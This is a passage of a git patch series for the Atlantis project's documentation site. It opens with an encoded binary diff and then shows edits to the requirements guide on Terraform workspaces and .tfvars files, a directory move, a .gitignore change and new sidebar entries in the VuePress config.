zgsFfy48~hdDrE3XT%zi}Wlcswb#vj=$%Us%If-!F4sq<l-1%<V%PF@B+a7zRqNi!g
z#@tb@a;nih-B5d-yfLks*D3f6;ipe{T*mWNN+e}?XhwTL5!bP=(pbEr>2u4p%<rh2
zhY}7P2Z>mYC=X{V%`)?(y?E@{4G$LevOizulx5~hz+c_#GhGVkZC+ntvngfM5|ntR
z*Q2>{>Ja^9i#Lh{Vn)!eyi+=a0<%~FjZj1R3u0Z@*xtkD9BQCbzM;uJ>s8yt@RDW?
z&@9#IkhaQN*}Isa6)4iEX<<paQb|Q7orpGNrkq-MsKP$)YT&K8zl)liyTBpr?i%r&
z`CWdgfnT8STOzhi_l9qhR7#tYKRm&x&zSw&6K&Rq6YQ~O%T>qQRkzc(Gu3WTu*p1$
zS+Qj)Ta>#N)JJ$Uh_oLzpKjOg2=*3#TD(!^8*Arrj@;nf>Kx!uby=KuN-{*gf<<vt
z1DsaTiD8;%ihsGw1|Sv;Tvb_;dOjF0-?Q^RIXb5WPp&<R)*L=7cKq<P8x9-Ez9#&s
zZ0rp9^7e58|LizcPV=rjy$<Wm%jxhNn=(}TYU@U5RhWSqPZ)g1BSE>m8S4gNx>*aN
z8|20kheVoQ2bF-Wghj)rk$NvSZPk%;=XI~9?d#;J6Tq}Dmgw_E7Ecob$2CDFED4Pd
z9IqK?{y7ylms{8)vrX9j0@^v}<eGsrj<@_5^Z@(i{l@6s;kHtzG`Dx&><?S^>Joxw
zi5cnmTkt%GgX3}b%x3G*%L2o)51bnhnmee7xbf<Z)mmFMmX&2qwoznAXXuiODn@xj
z-;3bxJbAl+G&U{P55`@@+iw>%U$uS!cYW8as*+b#B9&X5<|?XdG$4$4n%+h7SD$_8
z_tx3sve11)2>}I#UC72uF}$DY^Nf0L9)9n<Hi7BTu=88vyaf?h*Oeoc^!F{{3nfqT
zL9IM>fs7V!jxy*dr<_!S>hPvjXs&rRpf^+ZDO58RG*Jx0=T!&_B0eXl$qm@XAo@9*
z%{B0MG_&4JD0^S5Ox8Er_3=8ct;V!tL9@U-2O|1GM<2QAUrTDJ>g41TB;#mdi{V-P
zv}>>&Zc(S<OwH9zpI8cOfO<@Y4>*jGD-j2dOvd`c=kIl`Eay@UALrIBs2<$)T1~=3
zf@%=}+yb;`>=AJ?4m~sRpO5$~=@N?FjcMVqP>*b@1K)O90O}2LpC5aLRjR%B$9TO^
z8=5&%G7icxO%5b1Rdy8VresqB&n-m+Y6vqumXi0~hiAXs9q;U&aRwE?WZqHgG>UyF
zYf**=&#nqKpYGUk(6Tzcbn#NrL_$(HSr2S7JG@x--MSwH{mkx_=3(;Pv-L>2-5Si(
zW6rXfvHoK2LE9)5lhJPJi<@Xl^*e&1d@Jn3X6+%u%!!!%gZ%;TEE!kz`6jbUBPl1(
z=I4xwtIbr5S#ZTGwhpM?R201TC;3GA?^WtM-&Z%yoy0kR=RWT?gNJ?mXvS`Q=09U<
zmRUbEd@dsx^de*YZoddUu5NLL)Bft$fTZVup*WDXMVK{pqT7Ay%KBi&dH7<5|ETHR
zc*2VA<{9}@9bfrilHreG4Y^_4gr1QGkyNgc8ME^cSdD#GD=J|;112sJ-2%aLdnJv>
zIGsce=27VW!$Q%#$m!=+`*>d4>Yk?s&OoA*(^zJw9DClKP82jQ%WA3T%6a!Zny1f0
z^_LUVhUk-0SKXv@!FxS8bgC!*sckSUo%(ZHk=1jk!%~RJ<5@UlJUPq9q2y^dcYob>
z{Quy&uM#{83O9(cro7KQg6ST*H{~Z$MTnHM&!R_VWmS#~lHXI8CFT-KzpLw%9;Yi6
zG}s5RIMp(TcZd?&+aE48sB<)!`Sd%X7qUH3;T$fPPP0Sr73_z9Pn>4lABr}o!&_-Z
z_76A**B<w7fb(!h@PJ>zdL(f4vw9fSjnheL-jv<P$}}t2nwG7<Ym)%ZB-3E*jbvNb
z8pc`h$9@~yzYcG{`U$!8#9G@+ytMR?@7Dej6^InB+cNt@(k?2AUm)E)?_iF~?}6Py
z<7+iuS;7|k!UaiA%Y_U#i)I;(7<r0uveL>?W6i}z{~W>I{W5>fc?T==W0Y}RviX2U
zoWrQ2;)(bup`KsR6{1%%_vjbR_?MxF9+P2j;7J23VHCE|Z2gHbFW1Nio-GGXQ4%_K
zVjFf)zJt><%u4-5wI#h<m^XpnC?U~_*u(XGt=@``Gc<Ua9LXURvMxH1Nm)N#7yq2b
z>m_uUQN%x*N5tQIQ8gGZMR%jT#tatraVEqq3X(xp4QT`Kc%)7p^L?X{o{MBWZE~r+
zBJXvpP3?g$$Ya)jIYZnhV4viA%nW}iGjv-vvVELl4d2j8)~25{!mxO<DH{5zcFaxj
zbyeZ(mKFSWPQ#iZ+TDfr;qpm8XzOVN+1;2zoP3_5WuiIbTy$OrVfYj!!X5g^)@$&Q
z!%*U6W`=F+V(uFpE;m1speI_iq4Yxafx6ipOXkh_7!K-=@}zuv-oLs=Cd8lx@RQ#*
z3%{=t9LhH$Ase^jxGaRyCA7m%>=6mc8qVf8o?0ZmowTo(lq*@O&CYXGgr@r`o<8Ff
z`)XAM!av5TrB12U6%@?$?OVV6WO21hcMotoW*>o~B+<<dKf-vtkcq?~wa~crk+GxE
zyZmWRu(zWPe7knA+$?FV^$^c@5iI2?>HNOVdN&wX&;O1YYCkpBJgs`L!)MjT{TC#V
z?l8WujeelGGYS?8ji?%{qYTHC4tfE>t%rhaPyVG!6lgV7#a`w<gMtEKraZvD6-cKJ
zIQ_CZ`N*$o+HZ+bC~IttRlw2OjZePiwyv?=ePxx+i%9LQI1snQ|C6HAYAm<6PSr5?
zqV!JcK{3}dQ1WVhFuwM4MXT4Yg3$4Kt>rXsA)IwoqlA45k3CHsX>$Dst$Ff!)|sW9
z!~9D0#Y+UN-6)6pRrlPw>zBzwy4?$uha>xE{&0uQ>&aP$>`8m?8Pq^1&^GtN67aM&
zmBuNojot@!8sB!|8%8zo-G22A-o(ut&bCqTc=6UPz`WU^{`(^10I=JzE6977F%ji$
zgW~w1irEz|^jQQLYfM0?xdqfuh8UwaB_1+uX}i)W7Z#0qz1#!L%KOp_tnCx5D*o*l
zQR5-i?(=P`wD7W$0^TLARxQUa&Z#>?QKD((3^OTZ*N)#|f#BtTV}u5X5qVeJR-XX7
z{C-S7SpK<#_c$;XJ)SmzMNXOKZsh0$_xp7;`TvT$&Zwrgb*q3Pf`D*@L$`n^3hJRs
z=qN=bs0c_G5vd^v#0VjTCPk%K0BNC_gx-4<L{NGs5Fm)ugeIK?$lKg|&K=`%;m7;+
zeq>~1jFq+5nqS##eQVCW8);%IlgepgAblbnpABO)oGk>8-o6>nkuB-kn{zv-Thae}
zF-uNyQCHPm)SVVBBUm|-yS!J!TA;yDeAS<y+P@;W5_V64u>9%@8zk%OIj^(cWlEc?
z8DBUq77U)`7Jz%Wc%-WSDsmb!wmPbUmsUGY*$IRt>YG>VkPW@CXI|YFGpW7(?Y4}*
zHT4Cx(Bg{H_SG`?2jADe=2Q+8p3Cws4q(_F8t?@FKA+$|MC-xw`nL;6ZO(mwk$#A#
z!NV;`gMC|Ehyd18!wu+Lk3@+(&#jdfpAYp_ti2cN^VEj3-y?_AupttV#m*I%Uh2ZP
zf>r%Odr`D`2ME64K0yX*Wc)m&t@CnMe*p(_eKEIMN2t68Da0#$i%$;D$kf%IUMY?F
z_KGq^)G6NlK!+@#P$OX5)fh?X@vtEG@w)X5{7qhV;j4-Ee2UkG7RukE8hxg3n=3o{
zPn!atwRVqke<$c`9kq3Eu!Vwqlv=K@XeRsxpiJV5ygCpsLRJteqi2OL{oJ}<m`xFY
z1svxe(HjX<xJ8{F9Od{~OCr`_Er}ap<cl$+=P&h6%@9mS!e{K`45#~dHoh9f;`Y}`
z8%%)X$NqY=+CY`_j7$qIV|2_M3-c&s!}U6(g`7$iG>hNDa(a!H(;Qq@6(ZIg`MX;R
zgQ6wi@Ht$F)lyD)+Gof_Z}O{ocxSQ=$Oc0_&Uay?^_i&qB}n?ny5;R}U<170g28-Y
z-wpC3ShiAnqffk~(gv+U`auMH4V#~NWm6JoZ_3jkMMvuvM&##LyCQECVBtlLDEwpZ
z?<%#ph@G^ZcymYP-oDz3JIp(U$G5+oR}3_(T_=0K8F&s>_h+d5k+H=#Q+4AS!uHdx
zjKUR*pcSc=*?jrYm<Js5E^I8CAl$pr4tdW2GzGb6k~_sp=K#7PE^ZVZR$*f6Q6nOx
z&||KopoPz0M(W0F7Z}QM@;iWHFKeC1?KUJp$Jz$nRyC}QmxzI^qGWBtCccnSo!&1X
z*LJ9}=S@`$<yM>lyM<5(nKCT-L=}$b_#F@n4O~?Z;kt`X5~b;L6uCryU&v|+WGz$_
ztO(d%{1&^V51YPH;{GtSv+Z(xb{)<<O(%%;UfdFUJraW6UwZAl1r*_R8QLIzbRqo0
z!}(9&TNDnS*uC)JQ-sqwzn=bJRkcA@o7TkC)l-f|plaY9T4u?p4Lrs?J0tSh&3bQ)
zvDlBC2R6@UE*Tq|U|F4tQDcM>NXeWbE;qCHnNINw)0zmQ*yQ-vEc2s<rs98@+Ud2h
zh;KfReBo}N9ma#~gLQ;wJGsQ9HnMQ^w+W?6I(xJbtJgdgZ0pIM6a0%WvPbD)EWHSD
z#$-INm4?gBq;1xqOnqFN*riLXtdAP4BF3chz07^lwAxuuhfz)6K~6L#vr4Nb@txnF
z15A;xJa<F3hN2?VO;SXSe31wfd(OvUH&LI$X1S~c_y<IQoL#4xm~&1Ob}vR>&gJRl
z#V_h>UsEe?4R_+rm4vl6`(;klTq{$}`w&(9z17ege1)KM-st9FqzMJH5w~=b=gSK=
zAI&((y+k*<Q+TpyyV6N(C!u4DKQq*k$JbKhIaxTIVv?ViwBFk!S#>$gR#;dx?3_+H
z<IXpT?cPd=G_uxE%bROYAViL=@sG&=<xYE*eTCccCrHTgXS8FHx2;X6&)Asn1$Ww{
zl~p8UqU!N3)nsW_*2H+cwcd3X8bh9WEP17I0RHS%CcobPnwi~GAp2?@pLB&W3p+$C
zb?6?W%oCyMT`KTT5pMzWj)@LDB%m2bvADq_sG$lqgKG%OxEhO`1W-#+I@A<0GoaBY
zlR?a}!-bhfrJKdwiRi~-ri5zML9PkX6A(gYAE@uyh{R-0=EI6tr+9c`9Q5C%_h%C_
zbmPA3coaGJnP5t)cDt?D(=yDjOk#vm{N1ZgT}3b=3n7bBSJ>>|=FT|}B%+?bZ_HgS
z>Dl6e%qBz}{k<TIf7TQ|=yZ&Bnu{Y~QFZL5_#D5{pLwKLL^5szHBtM?llCNDuzcz%
ztbJ`U>0XYk1V~kuVyjWs+%Mfzhv=HwST}@VG}eK~-ccMnsZ+LV!+8t7lwK;oQONu8
z^JlnndU2?@Or~q%CwU$VcoEHXYm+j`bDKyKD_wi_v-gnhO8D=<$|{i7ququ!-VG?<
zt&$7mq+hUUX?2*E#Y{0hLRjj4MBeNQ9Rc+vz4Iu^qxUGf;`Z)O3$9CdBCfl9ylCcq
zt8F~ea%R1&XEhr+ZXss3<!(A;7Xr6W)z?sd9LLK@d(l@FOcvN+iMmVp=oyRBcNn;N
zI&ny&*@&RgjF!Ob!Q0C;gKjJ2?m`Wn2w7{HPW_F{s4g|O&-(pd*rA$J$>w}jX^?xC
zMGnPL?TMM(v_cW~OLKk8;JVD;Ec?!EeKqzdNDsjhhC;r#PI1JSRF_N%jO0(e<850F
zWEz-l7YPq+eYBMLDY%7ai@cyvledmIGw+I88QQU5@|ePgHhbCR6cOU&i&`DhTf-8H
zw}##PMWvSu!Px~;pLM8#maq}3{CGSc-M|lJs<R?uMTIXe_e9mSg1uGT8RZ*u(VkX?
zw0TxfuU&$Cb|DQWK);6WNlE176<+Nw)Y<*4w98U=*|hpj>3aF2Tnd!iR#na8hkUm9
zJ18-@gw!qK&R+KPn-1@F;W8e#hNOC8i5%iB7ejAp?7Nmq#{5(ksmkNSanCgBjVh20
ze{>wFEo^AVHwnHjv(GOb5s8KPFF`$y|1?+iL)@b!t*lLhI@0PMRydVt=<eWGYCu|-
zc3dhn+LlFZ7!#aruBF{K9Lkav?dW$U%*juGQRUsrJo=*jSz8swxq7kfsg&2;FZp8A
zwiHaulmltIm`mf?Y;TKZCR{W9@p4=2rVzAFKaiN+!U#(<?i{^*O}rR_o+tYDXVVvg
zGcvC{w1Sp=FIbXN!}1J&H$E9aC$o|?9Mkqb5)*a$<e4^9t4#dvkbaQAcyPJ$19r~*
zz^eUBJr$=t8qBX|1IN=^6KCt}4U4WP>$e{j6C*rIoeU8?FL%nb*d=baz|%3b<k)DQ
zYQ7<;B%|fENOKXAb6c}QT=ip*m}%mM0=Tk(ut{|8ZCYW4;1XeNj!V+&j7u0Yno_B;
z3g!D<@pF2;2APBA8>bl}%h9Dg^c$Ovsu0N|BeYdXiU-sd$wm9?c9(y^WFac`jo`^Y
z`Xe+gyUlTw9CM)FkPFiLrR;8S<+y6Sh|GoLvo3E|R$D8r`$UP|EPP9=Z$I=Ggx6P=
z0=0`A1J6c<Ev$DRu`<6v@`LqAeG_bI(e_vlI!%&eSn?!YX!<YhiL=Rffo1b;H-)-~
z*i+tm1$EE?yP{JMuAyI6V!dbi1fcJEn38pNCImc^FIu>{wjG6%J0=T7?S_^6JxtMq
zI{MhqhoI?5$j6<rnaeeyKMJKOXeQpy%lI4;sW=wa7Vssh7Niw%Oq6Zt?yECO9d+ut
z1HnC&73<u2#MCW)seai`iGfiTM>Jn9XmqVlv=Y~-%a3UnAKnn}wZ0%~pT0Px?i~L)
z@kPh`O6ccyUh0xKX;9)(``{LGtEaAHU5@HG;(6bw1KVBtb{(=5Kd8@%3+rba{+2cT
zq%x|M_LnqeR8u-Bl~9Te)h~u|32zbxp!oTU_0RNP(o;wGNA%Pl=}>UvV~t}9BNKS~
zHZx~ENQOs^0jGPVB$E6S!&e{2&7BJ+A(A|c+)y?s%M61oZCrf1D19LdxRb1dzE^4&
zZN7nRv-p#*>VD8q3YBW)i0S~9tae^9_57}gUsQJMloOA85rs5W_Kdh!@bvX@vl}gz
z^;CSa|MChb?d4>2@**ggS5fOy5hhgP<W<N-jn(7M+9=@U6#<`Zb)<1Tiu!h$Xx-@{
zZ`+wH7EgO?v2)eODRF|##!T!EN&dh!T>3V1dZBKrk(uMOv>p)y+Rgtq(C?Js$hRVh
zx>q9BVo2_bSy_#_roI&4DXi)Tge<m=Yl*EC1b5Dq?AQ%CzA-;Hn499XGe9A?K<(_c
zUEnhoGG*Q$B+C{+T*@yKuv`@7j{X>K)}G5F1c#MoHtFff@ZwQaieexG)4IGcyNi;t
zYeZn8TUCL0*3M>v2ZbC>pvS0F&R-448!>So%zNXWw-aXIeCb3rG#JyyQeGD&TQDd!
z`jt{g0&NEGJS?{<=4wyGm7d%Y_!;Yw92%=c@)lo}mE5=<D)^$N0zRT=!#6OqQ(kC3
z=}CIWld4DqZ#yo-Jm-{m)gaPOXGG+4I?gqVQNf9|H}xc=vex^)3Mp+`Ebpr=`>03)
zbS5cIFEOGFj~@e$Mmov)UgVa`kco4g^4s0Vp(|1gVd<hmPlz9#9~Cz<Pp2;)gEL-p
z-Mv5=-_`fabyQ$x6a36*LDf=TB<Tv?F>LK(0-knlapW8U>v?>KyY^-NJdRz)@tiOV
zK4&^8Aq&AAk3u^Nw%456TK{p87G&6u(48KR9XRDZRckmheKk?hj9b}^y&&3GUp|lJ
z-7(-*fy}-eilz7*BaOr?f^rdsN}j1LCU@C4jS<jYLV@mZ;9;eD)@Ov%T5Eh!*+}|Y
zu3VqH-^T#?DHEM2NRQ+O*7E)GW>T`raXSTe8pTF0x`i&1+xF6}o_+hpRT*6h;hZJn
zFLtll8@`Mf>qY#YKuFCi+Z0DF_M!qB!{-DZB)m3&k{f@o6ctDD;V|<!KEWzYbcot+
zH{s;!5}t?BYFv4V^bYH-4(%_-!I|RkQ?|@Pz32Q*$g`~)^6=FiUJ`LJ8IAM~hID#a
zZXR#*1+6gb4?HX<5P0&A3lp4LQ9$wq7hOLW1B6{d3=a=wBrbE++&HpZvfJsyQ|bo^
z3=TJ#I1|SKva$A<BZ}#BG74ph5z#DE&s>9*CQ{W6=&{$9)CtD>(bCI_MI`AfZnk-?
zH-A}nH@Nu`8!e2Mu!2ats43JsrZ%{jEFqqNtg+Ro_xnLhCAO`KTmA8ph$6kH1|d>%
zyf<MqzR{)yTZiTV(>~ZY|2hh5fg>1}Gs`c-Hy*X(-b3^vQrNay5lkI7QyEDYX>UU=
zO?x>MGBzr2XPuN`v}I?hnHS;PgbzJRBbZU8SZW4F*#@tdo3#)T+8d+FKbonFd|q=m
zW@IbYu`RGC10{8`oMXnb(;fD!A8(^$cPB`{O9l(zUl%Ec)ld4&LjR;~e4lKo>0bF@
zI~&@!u8R=$)pi2|^>t^q5tpy`&UARI=y}@^A1_|Nr{83r(vQx3IP{o061)CtWquo6
z@hjwp{MD8fU$Q1<v~q)M$3A;ye#36M49te8SX<eUw(hrF_0YBnef+(!(*P`LF8?&G
zo%fIJ5x8ZFd!L#va_$(iriZ7mRKsH^3L6$Ah`S%X(Q{>ECo#&nuOiVi(z$v<b0Gyi
zeH(=W>!U3{uSJGw=T#NV*L)3{&8n$8x)V`v^U8B4M09Q3NJ3BVOm}Z}hdr;-G94_#
zYSPTAkn3(@vM9~?k2J@mcJr`q%vXu~i_S9D=jPHLStfBmQ_3x+-{H>6?CB?(DLqsK
z1&-vorjEwlH0{`S3l&33>>_L?ckk7f&v7K+qeVjN(>(Uw<vZ^JJF_;1#O6|6?Af~6
zrlsrW1_3t<HICu&oQ{K3Oz#x8x9|o@)<pkgK127@Z)Io{ZUIU}jFxH=Wa=ys%5I~2
zD=6n{3b_dz3aB|vfu_Z<AxnBtiGfWd+-+JOtXCD@(qd3httM_N_mw98F^(L{%#nU>
zQskRhiA)j1k?;@{zLoINr_D}&xqt&QWSGv+=a$p@!vHj`&Cied=D0SG8feb2)!`fb
zj(V1}Tq%$N7I0+E(9CeQ|E&>c9g&^YoY35?tdhM^V2mNpj~bUZ=P%pbgcPGJ6xI1N
zUGDz|PfproWZi9^#n*Ay-^##{tDFCV03{e>kMfd+UhrgZX*;-le7^a|j}oe}^3eOI
zu+riOrt=mBe-$7uLu<=s;n64dZ+ae>0VRiTsH3r|TR#92S0F$T04Nj{0C%EdETSjQ
zUmCmN?icWS1mWJ8H97RlE3=e|RqrkPi8EC{)yEVoYdOuTyzSw|dFiLM`Glo>B})$^
z^(RRHJFAL-&8n_r?{8?iM7(z5>;&KZQO@#;Q&_Iav8B{*Jcz8=5l3wb^_M64p{X7j
zsu7*T)pa}j_h@_Fzc&WP9D|Sr6QZ(I)#6=c?-XyV)(e_8Q46?h`b|tzus6dcO76DD
zp9>o7)*hV<2RPV;vSqUS&z*qsi%J2&5fetRHCa(laE#~alhWQRYq@|4d8ul(FBdZ9
z?=-Cc;)dw=(-ZKGM{E4g)?KUnuj8wKRdGVE0cTj7ShIXqV5agu<4e}?h_Q!@*RIqK
zs58Hg#b9L<@!HccsE{kvFMyrZ;y~(lXByzdq0K+OkuCs)Y$431yr_a!T8T*5Me(5|
zBS=R8R>Auj;=Gyik_u)kN@|%H_kS4Bucfnf=}+{7n7V+tkYHd6qhmY(kRx>Yz)C4N
z^omjTZGaHU6)(4QN%BH<<JBX$4DhEVN;HxD^BCDcAhiNSxJ-0^qPerWw0@s_uNa~C
zcA@<crn%2qU!w0tKwx3#x_q2?T~X1TXSO}Ud&2r_*d6nYfj*PU>hsG?)J^B;67kiU
z@}Qx{X5;(0d58|d`9aRiKQE9VTL+V&KkmsBVsgR~1382n^epFebyM2zELmEIw}C&E
zj_>icJf+>eRVvI^D^vww-r?(a*a&QODCOy{nA3Gm45cSJ4)QN{J1@Y9jk1%kVF1yt
z_vjxuA<(Za9vR7VUa7y9NKr=fU4GJpwO-}g9(f|mtBNV+&1re}5}p%A{8ajcms+O9
zt?uIiGeMl^<qA*F`O@#ZCI0>M2|(awS2vRo*z@KBos=r_Rkw*O*M~+)V=PP1+_diI
zadVTBnum$d;q-d(%A#zqQe3)+xMVM^)=-}0<Fq!9HyK$mO^3X>Tj@N{0rnZodRo+^
z#&8&Qwt9~`8(OaZ3Hbi=#I*w_u5!dzjtemVuXgSJjMKuxjvd_+2a`m#GysU6&h^Pb
zIe`#_v-hbVXrZGFW`Ijeu%Kl^fy?&Dxp5!dol4S;J+i6#JIA@mBdYZl&!7KwpmUx$
z+nKeO=$jK`Wkt2L+Pran`-`amj;x4JK(mlRD3iIPUqHZul34hE@#X&Y$IE-9xhDdG
zY;7W1!9f;DtOs`o$Pj?>k)|7rLjkjO27fX;d9YR4gY$ujzV$8l(ggsDy;yaa-l!oH
zXjip<mt)|~*>fSFXzYG^#J^XxD&4?3R@gkc5#<jgsM_$fbBEwE287p=&JzA9FmGLr
zw$S}Y3xDTj-{U~Sllm0FJeLjNJo@^%(jonIdhOwCn^*t`_~nB+xSt0D6X63iW5U~q
zSlIXl+*(v69fET@AR&pkQ!OA00dW2hmc)B-cRnhLdpP?xTn+_@ot<T9vr~uRi~;bw
z3M+qc3&1(}>VNI}|1o#NUOTfFI<7{q&z>u%M)x0rv+EwtMyQLo9D#eu@b(X;`<7z+
z))@cUV|*^~;S@GA^GfKRtJR|@^rZa(2vVd-XUZS_t>)@Jaj=_fodyQ`$L!2Y2duKz
zBS2XAGJ^|tm@<Ps`0N-1QxnqjvLwfO{F326wC2Mi_y1kZBdTS`^}_iuLEIc5h^tr1
zzYlmY1JkLl)T@U%UeTThliNn_0=ErI`h$T~Ir|*&6AoPNdn^{v9Q8y>?caF(?KThg
zM3KkjZ;r-lMX*B^)sTn9#SC!OF36^^2Jn5uZ}L#x91C#WCqB(0jzGMnjRfsqPyN%q
z@5?<MA#PObT?M=FXD!X1y9ZB1>m=Y2pJy5y92iv9o~&^fAFOoq?FG`Z*8DCss-II>
ziWww(aI>Qf>;Kj;T<ZOsTy==hjot1)Cygo*UviHgVvC49(LqR$k+!}*Fv{6Gyng?L
z)&E|<Tn0pu5p)UsP+eiI;8MY4rNg4z-S^RPCYq3H=1k|eS8BX~!uN>wZSbuewa0${
E1A--qssI20

diff --git a/runatlantis.io/guide/requirements.md b/runatlantis.io/guide/requirements.md
index 5741408afb..c11f23c816 100644
--- a/runatlantis.io/guide/requirements.md
+++ b/runatlantis.io/guide/requirements.md
@@ -49,8 +49,18 @@ With modules, if you want `project1` automatically planned when `module1` is mod
 you need to create an `atlantis.yaml` file. See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
 
 ###  Terraform Workspaces
-This refers to [Terraform Workspaces](https://www.terraform.io/docs/state/workspaces.html). You need
-to tell Atlantis the names of your workspaces with an `atlantis.yaml` file. See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+::: tip
+See [Terraform's docs](https://www.terraform.io/docs/state/workspaces.html) if you are unfamiliar with workspaces.
+:::
+If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through an
+`atlantis.yaml` file that tells Atlantis the names of your workspaces
+(see [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details)
+or through the `-w` flag. For example:
+```
+atlantis plan -w staging
+atlantis apply -w staging
+```
+
 
 ### .tfvars Files
 ```
@@ -59,21 +69,10 @@ to tell Atlantis the names of your workspaces with an `atlantis.yaml` file. See
 │── staging.tfvars
 └── main.tf
 ```
-With .tfvars files, for Atlantis to be able to plan automatically, you need to create
-an `atlantis.yaml` file to tell it to use `-var-file`.
+For Atlantis to be able to plan automatically with `.tfvars files`, you need to create
+an `atlantis.yaml` file to tell it to use `-var-file={YOUR_FILE}`.
 See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
 
-## Terraform Workspaces
-Terraform introduced [Workspaces](https://www.terraform.io/docs/state/workspaces.html) in Terraform v0.9. They allow for
-> a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources
-
-If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through an
-`atlantis.yaml` file that tells Atlantis the names of your workspaces or through the
-the `-w` flag. For example:
-```
-atlantis plan -w staging
-```
-
 ## Terraform Versions
 By default, Atlantis will use the `terraform` executable that is in its path.
 To use a specific version of Terraform:

From ba833bff67ba85f1b20aee1a79374b3f2ac024bc Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 25 Jun 2018 13:30:41 +0100
Subject: [PATCH 49/69] Move terraform/ under runatlantis.io

---
 .gitignore                                                     | 1 +
 runatlantis.io/guide/requirements.md                           | 3 +++
 {website => runatlantis.io}/terraform/main.tf                  | 0
 .../terraform/modules/cloudfront_distribution/main.tf          | 0
 .../terraform/modules/cloudfront_distribution/outputs.tf       | 0
 .../terraform/modules/cloudfront_distribution/variables.tf     | 0
 {website => runatlantis.io}/terraform/s3_bucket_policy.json    | 0
 7 files changed, 4 insertions(+)
 rename {website => runatlantis.io}/terraform/main.tf (100%)
 rename {website => runatlantis.io}/terraform/modules/cloudfront_distribution/main.tf (100%)
 rename {website => runatlantis.io}/terraform/modules/cloudfront_distribution/outputs.tf (100%)
 rename {website => runatlantis.io}/terraform/modules/cloudfront_distribution/variables.tf (100%)
 rename {website => runatlantis.io}/terraform/s3_bucket_policy.json (100%)

diff --git a/.gitignore b/.gitignore
index b84b2a1911..9e06e28b0a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -9,3 +9,4 @@ website/src/public
 .cover
 .terraform/
 node_modules/
+**/.vuepress/dist
diff --git a/runatlantis.io/guide/requirements.md b/runatlantis.io/guide/requirements.md
index c11f23c816..2edf50c494 100644
--- a/runatlantis.io/guide/requirements.md
+++ b/runatlantis.io/guide/requirements.md
@@ -80,3 +80,6 @@ To use a specific version of Terraform:
  running and name it `terraform{version}`, ex. `terraform0.8.8`.
 2. Create an `atlantis.yaml` file for your repo and set the `terraform_version` key.
 See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
+
+## Next Steps
+Check out our [full documentation](../docs/).
diff --git a/website/terraform/main.tf b/runatlantis.io/terraform/main.tf
similarity index 100%
rename from website/terraform/main.tf
rename to runatlantis.io/terraform/main.tf
diff --git a/website/terraform/modules/cloudfront_distribution/main.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/main.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/main.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/main.tf
diff --git a/website/terraform/modules/cloudfront_distribution/outputs.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/outputs.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/outputs.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/outputs.tf
diff --git a/website/terraform/modules/cloudfront_distribution/variables.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/variables.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/variables.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/variables.tf
diff --git a/website/terraform/s3_bucket_policy.json b/runatlantis.io/terraform/s3_bucket_policy.json
similarity index 100%
rename from website/terraform/s3_bucket_policy.json
rename to runatlantis.io/terraform/s3_bucket_policy.json

From 0e71ccc6ad2bd3d80e500ba5f0b06f01dbd68bc0 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 25 Jun 2018 17:12:57 +0100
Subject: [PATCH 50/69] Finish docs

---
 runatlantis.io/.vuepress/config.js            |   5 +-
 runatlantis.io/docs/README.md                 |   2 +
 runatlantis.io/docs/apply-requirements.md     |  17 ++
 .../docs/atlantis-yaml-reference.md           | 213 +++++++++++----
 runatlantis.io/docs/autoplanning.md           |  19 ++
 runatlantis.io/docs/security.md               |   7 +
 runatlantis.io/docs/server-configuration.md   |   7 -
 .../guide/atlantis-yaml-use-cases.md          | 251 ++++++++++++++++++
 runatlantis.io/guide/requirements.md          |   8 +-
 9 files changed, 472 insertions(+), 57 deletions(-)
 create mode 100644 runatlantis.io/docs/apply-requirements.md
 create mode 100644 runatlantis.io/docs/autoplanning.md
 create mode 100644 runatlantis.io/guide/atlantis-yaml-use-cases.md

diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
index 34fd2d09ea..ba8a6ce8e5 100644
--- a/runatlantis.io/.vuepress/config.js
+++ b/runatlantis.io/.vuepress/config.js
@@ -36,7 +36,9 @@ module.exports = {
                 'pull-request-commands',
                 'deployment',
                 'server-configuration',
+                'apply-requirements',
                 'locking',
+                'autoplanning',
                 ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
                 'security',
                 'faq',
@@ -45,7 +47,8 @@ module.exports = {
                 '',
                 'test-drive',
                 'getting-started',
-                'requirements'
+                'requirements',
+                'atlantis-yaml-use-cases'
             ]
         },
         repo: 'runatlantis/atlantis',
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
index b55f19a237..90952633b6 100644
--- a/runatlantis.io/docs/README.md
+++ b/runatlantis.io/docs/README.md
@@ -4,7 +4,9 @@ This documentation is divided into sections:
 * [Pull Request Commands](pull-request-commands.html) - the commands that Atlantis supports via pull request comments.
 * [Production-Ready Deployment](deployment.html) - how to deploy Atlantis.
 * [Server Configuration](server-configuration.html) - how to configure the Atlantis server.
+* [Apply Requirements](apply-requirements.html) - what requirements can be set before `atlantis apply` is allowed.
 * [Locking](locking.html) - how and why Atlantis does locking.
+* [Autoplanning](autoplanning.html) - how Atlantis runs plan automatically.
 * [`atlantis.yaml` Reference](atlantis-yaml-reference) - reference docs for the `atlantis.yaml` configuration file.
 * [Security](security.html) - what you need to think about in terms of security for Atlantis.
 * [FAQ](faq.html) - Frequently asked questions.
diff --git a/runatlantis.io/docs/apply-requirements.md b/runatlantis.io/docs/apply-requirements.md
new file mode 100644
index 0000000000..34a3048484
--- /dev/null
+++ b/runatlantis.io/docs/apply-requirements.md
